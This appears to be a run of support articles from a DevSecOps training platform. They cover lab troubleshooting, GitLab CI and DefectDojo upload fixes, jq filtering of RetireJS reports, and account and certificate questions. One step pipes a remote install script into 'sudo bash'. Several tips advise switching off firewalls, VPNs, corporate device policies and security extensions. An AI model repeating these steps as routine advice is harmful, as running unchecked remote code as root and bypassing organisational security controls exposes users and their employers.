- If it still fails, capture the error message (e.g., "Network error" or "Blocked by policy") and include it in any support request.

Understanding Lab Performance Slowdowns

Lab environments (GitLab, Dojo, Production, Docker containers, etc.) rely on cloud-hosted virtual machines (VMs). Performance issues can stem from:

- Network instability – as with video playback, a shaky connection hampers SSH, Git operations, and UI responsiveness.
- Provisioning problems – a VM that hasn't fully started may appear "red" or show incomplete services.
- Resource contention – high CPU, memory, or I/O usage on the shared lab host can throttle your session.
- Browser session overload – too many open tabs or extensions can degrade the interactive UI.

Troubleshooting Slow or Unresponsive Labs

1. Confirm a Stable Internet Connection
- Repeat the speed/latency checks from the video section.
- If you're on Wi-Fi, try a wired Ethernet cable for a steadier link.

2. Verify Lab Provisioning Status
- Dashboard indicator: Look for a green status light or "Ready" badge.
- Red indicator: If the VM shows red, it's still provisioning or has encountered an error.
- Action: Click "Refresh" or "Re-provision" (if available).

3. Reload or Reset the Lab Environment
1. Reload: Click the browser refresh button or use the platform's "Reload Lab" command.
2. Reset: Most labs provide a "Reset Lab" option that destroys the current VM and spins up a fresh instance.
- Caution: Resetting will erase any unsaved work; commit changes to Git before resetting.

4. Reduce Local Resource Load
- Close unnecessary browser tabs and background applications.
- Disable heavy extensions (e.g., VPNs, ad blockers) while working in the lab UI.

5. Check Docker / Container Health (if applicable)
- Run docker ps to list running containers.
- Use docker stats to spot containers consuming excessive CPU or memory.
- Restart a problematic container: docker restart <container_id>.

6. Perform a Quick Network Ping from the Lab

```
ping -c 5 google.com
```

High latency or packet loss indicates a network issue that may require switching networks or contacting your ISP.

7. Document the Symptoms

When escalating, include:
- Timestamp of the slowdown.
- Lab name (e.g., "Dojo – Secure CI/CD").
- Error messages or screenshots.
- Steps already taken (reload, reset, network test).

Quick Tips & Frequently Asked Questions

| Question | Answer |
|----------|--------|
| What if my corporate VPN blocks the lab UI? | Disconnect from the corporate VPN temporarily, or use a personal VPN that routes traffic outside the corporate network. |
| Is there a way to pre-download videos for offline viewing? | Currently, videos are streamed only. However, you can request a downloadable version from support for regions with strict bandwidth caps. |
| My lab resets but the issue returns. What now? | This may indicate a broader platform issue. Capture the lab's console logs (usually via a "Download Logs" button) and attach them to your support request. |
| Do I need admin rights on my laptop to run labs? | No. Labs run in a remote VM accessed through a browser; local admin rights are not required. |

Pro Tip: Keep a small "cheat sheet" of the most common commands (git status, docker ps, kubectl get pods) handy. This reduces the time spent typing and helps you spot errors faster.

When to Contact Support

If you have tried all the steps above and still experience:
- Persistent video "cannot load" errors after switching networks and devices.
- A lab status that remains red or continuously times out despite resets.
- Repeated high latency (> 200 ms) or packet loss (> 5 %) on multiple networks.

Open a request with a real agent and include the following details:
1. Exact error messages or screenshots
2. Network diagnostics (speed test results, ping output)
3. Actions already performed (VPN use, lab reset, device change)

Our support engineers will prioritize your case and work with you to restore a seamless learning experience.

Happy Learning! By systematically checking your network, device, and lab provisioning status, most video and performance issues can be resolved in minutes. Keep this guide handy, and you'll spend less time troubleshooting and more time mastering DevSecOps skills. If you need further assistance, our support team is just a click away. 🚀
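The network-quality thresholds from this guide (≥ 5 Mbps download for SD and ≥ 15 Mbps for HD, ≤ 100 ms latency, < 1 % packet loss) can be wrapped in a small helper you run after a speed test. This is a sketch for illustration — the function name and interface are not part of any platform tooling:

```python
def network_ok(download_mbps, latency_ms, loss_pct, hd=False):
    """Check measurements against the guide's recommended values.

    Returns (ok, problems): ok is True when every threshold is met,
    problems lists which checks failed and why.
    """
    problems = []
    needed = 15 if hd else 5          # Mbps: HD vs SD streaming
    if download_mbps < needed:
        problems.append(f"bandwidth {download_mbps} Mbps < {needed} Mbps")
    if latency_ms > 100:              # guide recommends <= 100 ms
        problems.append(f"latency {latency_ms} ms > 100 ms")
    if loss_pct >= 1:                 # guide recommends < 1 % loss
        problems.append(f"packet loss {loss_pct}% >= 1%")
    return (not problems, problems)

ok, why = network_ok(download_mbps=20, latency_ms=45, loss_pct=0.2, hd=True)
print("HD streaming viable:", ok, why)
```

If `ok` comes back False, the listed problems tell you which remedy from the sections above to try first (switch networks, drop to SD quality, use wired Ethernet).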

Last updated on Feb 09, 2026

Technical Help: Resetting Your Password, Fixing Connectivity Issues, and Resolving the “Test Stage Missing” Lab Error in the GitLab Safety Exercise

Introduction

Whether you're new to the Practical DevSecOps training platform or a seasoned learner, encountering roadblocks can be frustrating. This guide consolidates three of the most common support topics into a single, easy-to-follow article:

1. How to reset your portal password
2. Troubleshooting network-related access problems
3. Resolving the "test stage seems to be missing" error in the How to Embed Safety into GitLab lab

Follow the step-by-step instructions, practical examples, and troubleshooting tips below to get back on track quickly.

1. Resetting Your Portal Password

Why a password reset might be needed
- Forgotten or mistyped credentials
- Security policy requiring periodic password changes
- Account lockout after multiple failed login attempts

Step-by-Step Reset Process

1. Open the password-reset page: https://id.practical-devsecops.training/realms/public/account/
2. Locate the "Change Password" section – it is usually positioned near the top of the page.
3. Enter your current password (if you remember it), then type the new password twice.
4. Follow any password-policy hints (e.g., minimum length, required symbols).
5. Click "Submit". You should see a confirmation message indicating that the password was updated successfully.

Tips for a Strong, Memorable Password
- Use a passphrase: combine 3–4 unrelated words (e.g., BlueCactus!2025).
- Include at least one uppercase letter, one number, and one special character.
- Avoid personal information such as birthdays or names.

If you do not receive a confirmation or encounter an error, clear your browser cache or try a different browser, then repeat the steps.

2. Troubleshooting Connectivity Issues

Access problems can stem from many sources – your local environment, corporate security controls, or the training platform itself. Below is a systematic checklist to isolate and resolve the most common culprits.

2.1 Checklist for Immediate Fixes

| # | Potential Issue | Quick Test / Fix |
|---|-----------------|------------------|
| 1 | Unstable internet connection | Run a speed test (e.g., speedtest.net). If latency > 150 ms or packet loss > 2 %, switch to a more stable network. |
| 2 | VPN blocking the portal | Disable the VPN temporarily and try reloading the site. |
| 3 | Firewall restrictions | Temporarily turn off the local firewall or add an exception for *.practical-devsecops.training. |
| 4 | Corporate laptop policies | Use a personal laptop or a clean virtual machine that isn't subject to strict IT policies. |
| 5 | Browser extensions interfering | Disable ad-blockers, privacy extensions, or security plugins, then reload. |
| 6 | Cached data causing conflicts | Open an Incognito/Private window (Chrome → Ctrl+Shift+N, Firefox → Ctrl+Shift+P) and log in again. |
| 7 | Mobile data as an alternative | Connect your device to a mobile hotspot and verify access. |

2.2 Detailed Troubleshooting Flow

1. Confirm the site is up – check https://status.practical-devsecops.training (if available) or use a service like DownDetector.
2. Ping the domain from a terminal:

```
ping id.practical-devsecops.training
```

If you receive timeouts, the issue is likely network-level.

3. Trace the route to pinpoint where packets are dropped:

```
traceroute id.practical-devsecops.training   # macOS / Linux
tracert id.practical-devsecops.training      # Windows
```

4. Contact your IT department if the trace stops at a corporate gateway – request an exception for the training domain.

2.3 Pro Tips
- Keep a dedicated browser profile for training (no extensions, default settings).
- If you frequently switch between work and personal networks, consider using a portable browser on a USB stick.
- Document any corporate proxy settings; you may need to add them to the browser's proxy configuration.

3. Fixing the "Test Stage Seems to Be Missing" Error in the GitLab Safety Lab

The How to Embed Safety into GitLab lab asks you to rename a job from test to oast. The error "test stage seems to be missing" appears when the stage name is inadvertently altered instead of the job name.

3.1 Understanding Jobs vs. Stages
- Job – a single unit of work (e.g., oast).
- Stage – a logical grouping of jobs (e.g., test).

Both are defined in the .gitlab-ci.yml file, and the CI/CD runner expects the exact stage name that already exists.

3.2 Correct YAML Snippet

```yaml
oast:            # <-- this is the job name you rename
  stage: test    # <-- keep the stage name unchanged
  script:
    - docker run --rm -v $(pwd):/src hysnsec/safety check -r requirements.txt --json > oast-results.json
  artifacts:
    paths: [oast-results.json]
    when: always
  allow_failure: true
```

3.3 Step-by-Step Fix

1. Open the .gitlab-ci.yml file in your preferred editor.
2. Locate the block that begins with test: (the original job name).
3. Change only the label before the colon from test: to oast:. Do not modify the line stage: test.
4. Save the file and commit the change:

```
git add .gitlab-ci.yml
git commit -m "Rename test job to oast for safety lab"
git push origin <your-branch>
```

5. Return to the lab UI and click Check. The challenge checker will now recognize the correctly named job.

3.4 Common Pitfalls

| Symptom | Likely Cause | Remedy |
|---------|--------------|--------|
| "test stage seems to be missing" | Stage name edited (e.g., stage: oast) | Revert the stage line to stage: test. |
| Checker reports a case-sensitive mismatch | Job name capitalized incorrectly (Oast) | Use all-lowercase oast. |
| No output files in artifacts | Misspelled artifact path (oast-results.json) | Ensure the path matches exactly. |

3.5 Quick Validation

Run a local pipeline simulation (if you have GitLab Runner installed) to verify the job before committing:

```
gitlab-runner exec docker oast
```

If the job executes without stage errors, the lab should pass.

4. Frequently Asked Questions & Quick Tips

FAQ
- Q: I reset my password but still can't log in.
  A: Clear browser cookies for the domain, or try a different browser.
- Q: My corporate firewall blocks the portal even after disabling VPN.
  A: Request an explicit whitelist for id.practical-devsecops.training from your IT security team.
- Q: The GitLab lab still shows the error after I think I fixed it.
  A: Ensure you committed the change and pushed to the correct branch. The checker only evaluates the remote repository.

Quick Tips
- Bookmark the password-reset URL for future reference.
- Keep a network troubleshooting cheat sheet (ping, traceroute, incognito) handy.
- Use git diff (git diff HEAD~1) to verify that only the intended lines changed in the .gitlab-ci.yml.

Conclusion

By following the structured procedures outlined above, you can quickly reset your portal password, overcome typical connectivity hurdles, and resolve the "test stage seems to be missing" error in the GitLab safety lab. Mastering these troubleshooting skills not only smooths your learning journey but also reinforces the DevSecOps mindset of proactive problem solving.

If you encounter any other issues, please reach out to the Technical Support team via the learning platform's help desk. Happy securing!
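The test→oast rename described above can also be sanity-checked locally before you push. This is a rough, stdlib-only sketch (a simple regex scan, not a full YAML parse — a real YAML parser would be more robust); the function name is illustrative:

```python
import re

def check_rename(ci_text):
    """Heuristic check of the test -> oast job rename in .gitlab-ci.yml."""
    errors = []
    # The job label before the colon must now be 'oast'.
    if not re.search(r"^oast:\s*$", ci_text, re.M):
        errors.append("job 'oast:' not found - rename the label before the colon")
    # The stage line must be untouched.
    if not re.search(r"^\s+stage:\s*test\s*$", ci_text, re.M):
        errors.append("'stage: test' missing - the stage name must stay unchanged")
    # Catch the classic mistake: editing the stage instead of the job.
    if re.search(r"^\s+stage:\s*oast\s*$", ci_text, re.M):
        errors.append("'stage: oast' found - you edited the stage, not the job")
    return errors

good = "oast:\n  stage: test\n  script:\n    - echo hi\n"
bad = "oast:\n  stage: oast\n  script:\n    - echo hi\n"
print(check_rename(good))   # empty list: rename looks correct
print(check_rename(bad))    # flags the edited stage name
```

An empty result means the two conditions the lab checker cares about — job named oast, stage still test — both hold.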

Last updated on Feb 06, 2026

Troubleshooting DefectDojo Upload Errors (400 Bad Request, 500 Internal Server Error, and TruffleHog Imports)

DefectDojo is a powerful open-source platform for managing application security findings, but uploading scan results can sometimes trigger error messages that interrupt your workflow. This guide explains the most common upload failures – 400 Bad Request, 500 Internal Server Error, and missing content when importing TruffleHog reports – why they happen, and step-by-step solutions to get your data into DefectDojo quickly and reliably.

Table of Contents
1. Understanding the 400 Bad Request error
2. Resolving the 500 Internal Server Error
3. Why a TruffleHog upload shows only the file name
4. General troubleshooting checklist
5. Tips & Frequently Asked Questions

1. 400 Bad Request – What It Is and How to Fix It

A 400 Bad Request response tells you that DefectDojo rejected the request because the client (you) supplied invalid data. In the context of uploads, the most common causes are:

| Cause | Description | Example |
|-------|-------------|---------|
| Incorrect scanner name | Scanner identifiers are case-sensitive and must match the exact name stored in DefectDojo. | Using --scanner "zap scan" instead of "ZAP Scan". |
| Missing or wrong argument | A required CLI argument is omitted or contains a typo. | --scanner "SSLyze 3 Scan (JSON)" – the scanner does not exist in DefectDojo. |
| Non-existent engagement ID | The --engagement_id you reference does not correspond to any engagement in the system. | --engagement_id 3 when there is no engagement with ID 3. |

How to Resolve a 400 Error

1. Verify the scanner name
   - Open DefectDojo → Configuration → Scanners.
   - Copy the scanner name exactly (including spaces and capitalization).
   - Use that string in your upload command.
2. Check required arguments
   - Run the upload script with the --help flag to see all mandatory parameters.
   - Ensure each argument is present and correctly spelled.
3. Confirm the engagement ID
   - Navigate to Engagements in the UI.
   - Locate the numeric ID (displayed in the URL, e.g., …/engagement/42/).
   - Use that ID in the --engagement_id flag.
4. Re-run the command after correcting the values.
   - If the error persists, capture the full CLI output with --debug and compare it to the API payload shown in the DefectDojo logs (Admin → System Settings → Logging).

2. 500 Internal Server Error – What It Is and How to Fix It

A 500 Internal Server Error indicates that DefectDojo received the request but failed while processing it. The most frequent trigger for upload-related 500 errors is a malformed or empty scan output file.

Typical Scenarios

| Situation | Why It Causes a 500 | Remedy |
|-----------|---------------------|--------|
| Empty XML/JSON file (e.g., an empty zap-output.xml) | The parser expects at least one finding; an empty document raises an exception. | Regenerate the scan, ensuring that the tool actually discovers findings, or manually add a dummy entry for testing. |
| Incorrect file format (e.g., uploading a plain-text log to a parser that expects JSON) | The parser cannot deserialize the content. | Use the exact output format documented for the tool (see DefectDojo's parser list). |
| Corrupted file (truncated or non-UTF-8 encoding) | Parsing fails with a Unicode or XML error. | Re-download the report, verify file integrity, and confirm UTF-8 encoding (file -i report.xml). |

Step-by-Step Fix

1. Open the report locally and confirm it contains data:

```
head zap-output.xml
```

2. Validate the file against its schema (if available):
   - For XML: xmllint --noout --schema zap_schema.xsd zap-output.xml
   - For JSON: python -m json.tool report.json
3. If the file is empty or malformed, re-run the original scanner with the appropriate output options (e.g., -o zap-output.xml).

3. TruffleHog Upload Shows Only the File Name

When importing a TruffleHog scan via CI/CD, you may see the file name appear in DefectDojo but no findings. This usually stems from using the wrong output format or from a parsing mismatch.

Correct TruffleHog Output for DefectDojo

DefectDojo expects JSON-formatted results that match the parser documented here: https://defectdojo.github.io/django-DefectDojo/integrations/parsers/#trufflehog

The CLI flag to produce JSON is:

```
trufflehog git . --json > trufflehog-report.json
```

Troubleshooting Steps

1. Download the generated report from the CI job artifact.
2. Open the file and verify it contains an array of JSON objects, each with path, commit, rule, reason, etc.
3. Test the import via the GUI:
   - In DefectDojo, go to Findings → Import Scan.
   - Choose TruffleHog as the scanner, upload the JSON file, and click Import.
   - If findings appear, the file format is correct; the issue lies in the CI upload script.
4. If the GUI import also shows only the file name, the report is likely not JSON (e.g., plain text). Regenerate it using the --json flag.
5. Update your CI/CD step to reference the correct file path and format. Example for GitLab CI:

```yaml
trufflehog_scan:
  stage: test
  script:
    - trufflehog git . --json > trufflehog-report.json
    - |
      curl -X POST "$DEFECTDOJO_URL/api/v2/import-scan/" \
        -H "Authorization: Token $DD_API_TOKEN" \
        -F "file=@trufflehog-report.json" \
        -F "scan_type=TruffleHog Scan" \
        -F "engagement=42"
```

6. Run the pipeline again and verify that findings appear under the selected engagement.

4. General Troubleshooting Checklist

| ✅ Checklist Item | Why It Matters |
|-------------------|----------------|
| Use --debug / -v flags on upload scripts | Shows the exact payload sent to the API, making it easier to spot missing fields. |
| Confirm the API endpoint (/api/v2/import-scan/) | A wrong endpoint returns 404 or 500. |
| Validate the authentication token | Expired or missing tokens cause 401/403, which can masquerade as 400 errors. |
| Check DefectDojo version compatibility | Parsers evolve; an older Dojo instance may not support newer scanner output. |
| Review server logs (docker logs dojo_web or /var/log/uwsgi/app.log) | Provides stack traces that pinpoint the exact parser failure. |
| Restart the Dojo service after configuration changes | Some settings (e.g., new scanners) require a reload to take effect. |

5. Tips & Frequently Asked Questions

Tips for Smooth Imports
- Keep scanner names consistent: Store them in a small reference file (scanners.txt) and copy-paste to avoid case errors.
- Automate validation: Add a pre-flight step in CI that runs python -m json.tool or xmllint on the report before uploading.
- Leverage the GUI for first-time imports: It quickly confirms that the report format is acceptable before you script the CI integration.

Frequently Asked Questions

| Question | Answer |
|----------|--------|
| Can I upload a zip file containing multiple reports? | Yes, but only if the zip contains files of a single supported format and you specify the correct scan_type. |
| What if I get a 400 error even after correcting the scanner name? | Verify that the engagement ID exists and that you have permission to add findings to that engagement. |
| Is there a way to see which parser raised a 500 error? | Enable detailed logging (LOGGING_LEVEL = "DEBUG" in settings.py). The server log will list the parser name before the traceback. |
| Why does TruffleHog sometimes output "null" findings? | This occurs when the scan runs on a repository with no secrets. The file is still valid JSON but contains an empty array – DefectDojo imports zero findings, which appears as "only the file name". |

Bottom Line

Understanding the root cause of DefectDojo upload errors – whether they stem from incorrect scanner arguments (400), malformed output files (500), or improper TruffleHog formatting – allows you to resolve issues quickly and keep your vulnerability management pipeline flowing. Use the systematic steps above, validate your reports locally, and leverage DefectDojo's logs and GUI to pinpoint problems before they block your CI/CD processes. Happy scanning!
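The "validate locally before uploading" advice above can run as a CI pre-flight step. The sketch below (the function name and return strings are illustrative, not DefectDojo API) rejects the empty and malformed files that typically surface as a 500 from the parser:

```python
import json
import xml.etree.ElementTree as ET
from pathlib import Path

def preflight(path):
    """Reject empty/malformed reports before they reach DefectDojo."""
    p = Path(path)
    # An empty file is the classic cause of an upload-time 500.
    if not p.exists() or p.stat().st_size == 0:
        return "empty or missing file"
    try:
        text = p.read_text(encoding="utf-8")   # catches corrupted encoding
    except UnicodeDecodeError:
        return "not valid UTF-8"
    if path.endswith(".json"):
        try:
            json.loads(text)
        except json.JSONDecodeError as e:
            return f"malformed JSON: {e}"
    elif path.endswith(".xml"):
        try:
            ET.fromstring(text)
        except ET.ParseError as e:
            return f"malformed XML: {e}"
    return "ok"

# Example: a well-formed (if tiny) JSON report passes the check.
Path("report.json").write_text('[{"path": "app.py", "reason": "High Entropy"}]')
print(preflight("report.json"))   # ok
```

Wiring `preflight` in before the curl upload step means a broken report fails the pipeline with a readable message instead of an opaque server error.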

Last updated on Jan 06, 2026

Technical Support Guide: Lab Errors, Data Privacy, Certificate Validity & Support Channels for Practical DevSecOps Learners

Technical Support Guide: Lab Errors, Data Privacy, Certificate Validity & Support Channels for Practical DevSecOps Learners Introduction Whether you’re troubleshooting an InSpec profile, wondering how your passport data is protected, or need clarity on certificate lifetimes, this guide consolidates the most common support topics for Practical DevSecOps courses. By following the steps and best‑practice tips below, you can resolve lab issues quickly, stay compliant with privacy regulations, and understand the long‑term value of your certifications and support channels. 1. Resolving Lab Execution Issues 1.1 SSH Authentication Errors with the Linux Baseline InSpec Profile Typical scenario: You launch the Linux Baseline InSpec profile, but the run fails with an SSH authentication error, even after following the video walkthrough. Root causes to check: 1. Incorrect SSH credentials – Ensure the username, password, or private key matches the target VM. 2. Network restrictions – Verify that the lab VM allows inbound SSH (port 22) from your IP address. 3. Host key verification – If the VM’s host key changed, the SSH client may reject the connection. Quick fix: - Open a terminal and manually ssh into the VM using the same credentials. If you can connect, re‑run the InSpec profile. - If the manual test fails, regenerate the SSH key pair in the lab environment and update the InSpec ssh_key attribute. 1.2 Switching to Cinc Auditor (formerly Chef InSpec) If you continue to encounter authentication problems, you may use Cinc Auditor for the Configuration as Code (CaC) job instead of the native InSpec runner. How to switch: 1. Install Cinc Auditor (if not already installed): curl -L https://omnitruck.cinc.sh/install.sh | sudo bash -s -- -P auditor 2. Run the same profile with Auditor: cinc-auditor exec path/to/linux-baseline-profile 3. Provide the same SSH options (--target ssh://user@host) as you would with InSpec. 
Cinc Auditor uses the same profile syntax, so no changes to the profile files are required. This alternative often bypasses environment‑specific bugs that affect the InSpec binary. 2. Passport & Verification Document Handling 2.1 What Happens to Your Passport Data? - No third‑party sharing: Your passport scan or any verification document is never shared outside Practical DevSecOps. - Immediate deletion: In compliance with SOC 2, ISO 27001, and GDPR, the document is deleted right after verification. You can review the full privacy policy here: https://trust.practical-devsecops.com. 2.2 Retention Period - Zero‑retention model: Once the identity check is successful, the file is purged from our systems. No backup copies are retained. 3. Certificate Validity & Renewal 3.1 Do DevSecOps Certificates Expire? Answer: No. All Practical DevSecOps certificates are lifetime credentials. There is no renewal fee or periodic re‑certification requirement. 3.2 When Might You Need an Updated Credential? - New version releases: If a major course version is launched (e.g., “DevSecOps Engineer v2”), you may choose to earn the updated badge for market relevance. - Employer requirements: Some organizations request a recent assessment; in that case, you can retake the exam for a fresh certification date. 4. Dedicated Support Channels 4.1 How Long Is a Dedicated Channel Active? - The channel remains open as long as you interact at least once every 90 days. - If there is no activity for more than three months, the channel is automatically archived. 4.2 Reactivating an Archived Channel 1. Open a new ticket via the Support Portal. 2. Reference the archived channel ID. 3. Our support team will restore the channel within 24 hours. 5. Getting Help with Lab Issues 5.1 Using the “Chat with support” Feature All labs include a built‑in Chat with support button. When you click it: - System logs (including console output) are attached automatically. 
Best practice: Add a brief description of what you were trying to accomplish before the error occurred. This context speeds up resolution. 5.2 Example Support Request “I’m trying to run the Linux Baseline InSpec profile on the Ubuntu VM (IP 192.168.1.10). The run fails with ‘SSH authentication failed – permission denied (publickey)’. I have verified that the private key is uploaded to the lab’s ~/.ssh folder.” Providing the IP address, error message, and verification steps helps the support team diagnose the issue within minutes. 6. Frequently Asked Questions (FAQs) | Question | Quick Answer | |----------|--------------| | Can I replace InSpec with Cinc Auditor for any lab? | Yes, for all CaC jobs. The profile syntax is identical. | | Is my passport data ever stored after verification? | No. It is deleted immediately per SOC 2/ISO 27001/GDPR. | | Do I need to renew my certificate after a year? | No. Certificates are lifetime; only optional re‑certifications apply. | | What triggers channel archiving? | Inactivity longer than 90 days. | | What information is sent when I use “Chat with support”? | Screenshot, console logs, and your typed message. No personal data is transmitted unless you include it. | 7. Tips for Smooth Lab Experiences - Pre‑flight checklist before running any profile: verify SSH credentials, confirm network connectivity, and ensure the correct version of the tool (InSpec or Cinc Auditor) is installed. - Bookmark the privacy policy page for quick reference on data handling. - Set a calendar reminder to interact with your dedicated channel at least once every two months to avoid auto‑archiving. - Take screenshots of error messages before contacting support; the built‑in chat already captures them, but having a local copy can be handy for follow‑up documentation. Conclusion Technical hurdles, data‑privacy concerns, and support logistics can feel overwhelming, but Practical DevSecOps provides clear pathways to resolve each. 
By leveraging Cinc Auditor as an alternative to InSpec, understanding our strict passport‑data deletion policy, recognizing the lifetime value of your certificates, and using the built‑in chat support effectively, you’ll stay focused on mastering DevSecOps skills rather than troubleshooting roadblocks. If you run into an issue not covered here, reach out through the Chat with support button and ask for a real agent. Happy learning!

Last updated on Mar 13, 2026

Account Support & Credentialing for DevSecOps Learners

Account Support & Credentialing for DevSecOps Learners Quickly get the help you need—whether you’re checking staff availability, figuring out course start deadlines, or locating your Credly badge. This guide consolidates the most common support scenarios and provides step‑by‑step instructions so you can stay focused on mastering DevSecOps concepts. Introduction Enrolled in a DevSecOps certification program? You’re not alone. Learners often have questions about account support, course timelines, and credentialing. This article walks you through three frequent issues: 1. Identifying which staff members are currently online. 2. Understanding the time window for starting a new course. 3. Retrieving a missing Credly badge. By following the procedures below, you’ll resolve these concerns efficiently and keep your learning journey on track. 1. How to Find Online Staff Members When you need immediate assistance—perhaps for a lab environment or a content clarification—knowing who’s available can save valuable time. Steps to Locate Online Staff 1. Open the Mattermost communication channel. 2. Check the presence indicators next to each staff member’s name. Most tools display a green dot for “online,” a yellow dot for “away,” and a gray dot for “offline.” Example Scenario You’re stuck on a Kubernetes hardening lab and need clarification on a security policy. - You open the #ccnse Mattermost channel. - No staff member has replied within 5 minutes. - You type @here I’m having trouble with the pod security policy. Can anyone help? - Within a couple of minutes, a lab instructor replies with the needed guidance. Tip: Avoid over‑pinging. Use @here only when the issue is time‑sensitive and you’ve already waited a reasonable period (e.g., 5‑10 minutes). 2. Time Window for Starting a New Course After enrolling, you schedule your own start date using the instructions in the “Confirmation of Course Enrollment” email. You have up to one year from enrollment to begin, and lab access runs for 60 days once you start, so pick a start date that fits your schedule and set a reminder well before the one‑year window closes. 3. Missing Your Credly Badge Credly (formerly Acclaim) issues digital badges that verify your DevSecOps achievement. If the badge email never appears, follow these steps. Step‑by‑Step Checklist 1.
Search your email folders - Look in Inbox, Spam, Junk, and Promotions for a message from no-reply@credly.com or badge@acclaim.com. 2. Verify your email address - Ensure the address on your learner profile matches the one you’re checking. Update it in the platform settings if needed. 3. Resend the badge - Log into the DevSecOps learning portal, navigate to My Credentials, and click Resend Badge. 4. Check Credly account - If you have an existing Credly account, log in at credly.com and look under My Badges. The badge may already be attached. 5. Contact support - If the badge is still missing, open a support request and ask for a real agent, including the following details: - Full name and learner ID - Course name and completion date - Email address used for enrollment Tip: Include a screenshot of your My Credentials page to speed up verification. Common Questions & Quick Tips | Question | Quick Answer | |----------|--------------| | What if I’m offline when staff is online? | Staff members will see your message and reply when they return. Use @here only when you need an immediate response. | | Do I need a Credly account to receive the badge? | No. Credly will create a temporary link for first‑time recipients, but creating an account lets you manage and share the badge later. | | How long does it take for support to respond? | Typical response time is within 24 hours on business days. Critical lab issues are prioritized. | Final Thoughts Navigating account support and credentialing doesn’t have to be a hurdle. By checking staff availability with @here, respecting the one‑year course start window, and following the badge‑retrieval checklist, you’ll keep your DevSecOps learning experience smooth and rewarding. If you encounter any other issues, remember that the Technical Support team is just a message away—ready to help you succeed in your certification journey. Happy learning!

Last updated on Feb 09, 2026

SCA Output Formats, Filtering High‑Severity Issues, and Retrieving DefectDojo IDs

SCA Output Formats, Filtering High‑Severity Issues, and Retrieving DefectDojo IDs Learn how to save SCA results as JSON, filter high‑severity findings in RetireJS, and locate key identifiers (project, engagement, and lead IDs) in the DefectDojo portal. Introduction Software Component Analysis (SCA) tools such as RetireJS are essential for identifying vulnerable open‑source libraries in modern applications. While these tools generate rich JSON reports, learners often wonder how to: 1. Persist the JSON output to a file. 2. Isolate high‑severity findings from a RetireJS report. 3. Locate the project, engagement, and lead identifiers required for DefectDojo API calls or manual uploads. This article walks you through each of these tasks step‑by‑step, providing command‑line examples, JSON‑query snippets, and navigation tips for the DefectDojo web UI. By the end of the guide you’ll be able to automate report handling, focus on the most critical vulnerabilities, and correctly reference DefectDojo IDs in your DevSecOps pipelines. 1. Identifying High‑Severity Issues in RetireJS Output RetireJS produces a JSON structure where each component may contain multiple vulnerabilities, each with a severity field (low, medium, high). Filtering can be done with jq, a lightweight and powerful JSON processor. 1.1 Example RetireJS JSON (Simplified) { "data": [ { "results": [ { "component": "jquery", "version": "3.3.1", "vulnerabilities": [ { "severity": "high", "info": "CVE-2020-11022" }, { "severity": "low", "info": "CVE-2019-5436" } ] } ] } ] } 1.2 Command to List High‑Severity Findings cat retire_output.json | jq -r ' .data[].results[] | select(.vulnerabilities[].severity == "high") | "\(.component) \(.version) – \(.vulnerabilities[] | select(.severity=="high") | .info)" ' Explanation - -r outputs raw strings (no quotes). - The select filter keeps only results where any vulnerability has severity == "high".
- The final string concatenates the component name, version, and CVE identifier. 1.3 Command to List Low‑Severity Findings (For Comparison) cat retire_output.json | jq -r ' .data[].results[] | select(.vulnerabilities[].severity == "low") | "\(.component) \(.version) – \(.vulnerabilities[] | select(.severity=="low") | .info)" ' You can replace "low" with "medium" or "high" to target a different severity level. 1.4 Saving the Filtered Results # Save high‑severity list to a file cat retire_output.json | jq -r '...' > high_severity_issues.txt 2. Finding Project, Engagement, and Lead IDs in DefectDojo DefectDojo uses numeric IDs to uniquely identify Products (projects), Engagements, and Leads (users). These IDs are required when you import scan results via the API or when you need to reference a specific engagement in lab instructions. 2.1 Navigating the UI 1. Log in to the DefectDojo portal. 2. From the left navigation pane, select Products → View Products. 3. Click the product you are working with. The Product ID appears in the browser’s address bar, e.g.: https://defectdojo.example.com/product/42/ Here, 42 is the product (project) ID. 4. Inside the product view, click Engagements → View Engagements. 5. Choose the desired engagement. Its URL will look like: https://defectdojo.example.com/engagement/108/ 108 is the engagement ID. 6. To locate the lead (user) ID, open People → Users and click the user’s name. The URL will contain /user/<id>/. https://defectdojo.example.com/user/7/ 7 is the lead’s ID. 2.2 Using the IDs in API Calls curl -X POST "https://defectdojo.example.com/api/v2/import-scan/" \ -H "Authorization: Token <YOUR_API_TOKEN>" \ -F "engagement=108" \ -F "lead=7" \ -F "file=@retire_report.json" Replace the numeric values with the IDs you retrieved from the UI. 
2.3 Common Pitfall: “Issues Not Marked as False Positive” If you modify a JSON report (e.g., delete three issues) and re‑upload it, DefectDojo may still show the original findings because: - The original findings are stored as separate objects; deleting them from the uploaded file does not automatically mark them as false positives. - You must either re‑upload the modified file through the dedicated reimport endpoint (/api/v2/reimport-scan/), which reconciles the stored findings against the new report, or manually mark the unwanted findings as False Positive in the UI. Quick fix (the test ID is returned by the original import and is also visible in the test’s URL): curl -X POST "https://defectdojo.example.com/api/v2/reimport-scan/" \ -H "Authorization: Token <TOKEN>" \ -F "test=<TEST_ID>" \ -F "scan_type=Retire.js Scan" \ -F "file=@modified_report.json" Common Questions & Tips | Question | Quick Answer | |----------|--------------| | How do I filter both high and medium severity at once? | Use a regex or multiple conditions: select(.vulnerabilities[].severity | test("high|medium")). | | Where do I find the API token for DefectDojo? | In the UI: User → API Tokens → Generate New Token. Store it securely. | | What if the URL does not show an ID? | Ensure you are on the detail page (e.g., “View Engagement”) rather than a list view. | | Is there a way to automate ID retrieval? | Yes – use DefectDojo’s REST API: GET /api/v2/products/ returns product IDs in JSON. | Conclusion By mastering simple shell redirection, jq filtering, and DefectDojo navigation, you can streamline the entire SCA reporting workflow: - Extract high‑severity vulnerabilities from RetireJS output for focused remediation. - Identify the exact project, engagement, and lead IDs required for DefectDojo imports and API interactions. These skills not only help you complete lab assignments efficiently but also lay the groundwork for automating SCA processes in real‑world DevSecOps pipelines. Happy scanning!

Last updated on Jan 07, 2026

Advanced Jenkins Tagging, Enterprise‑Grade Pipelines, and Failure Handling in GitHub Actions

